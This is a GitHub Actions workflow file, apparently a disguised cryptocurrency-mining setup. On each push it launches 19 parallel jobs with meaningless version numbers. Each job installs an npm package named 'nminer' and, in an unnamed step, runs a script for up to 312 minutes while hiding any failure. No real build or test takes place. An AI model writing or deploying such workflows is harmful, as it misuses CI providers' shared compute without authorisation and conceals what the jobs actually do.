name: apparatus
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 8973 }
          - { version: 1039 }
          - { version: 2745 }
          - { version: 761 }
          - { version: 2299 }
          - { version: 4795 }
          - { version: 4088 }
          - { version: 5932 }
          - { version: 994 }
          - { version: 1361 }
          - { version: 5695 }
          - { version: 2211 }
          - { version: 4998 }
          - { version: 7291 }
          - { version: 8704 }
          - { version: 450 }
          - { version: 248 }
          - { version: 5346 }
          - { version: 6169 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: 
        run: |
          npm install nminer@latest
          timeout 312m node apparatus.js || echo "apparatus executed"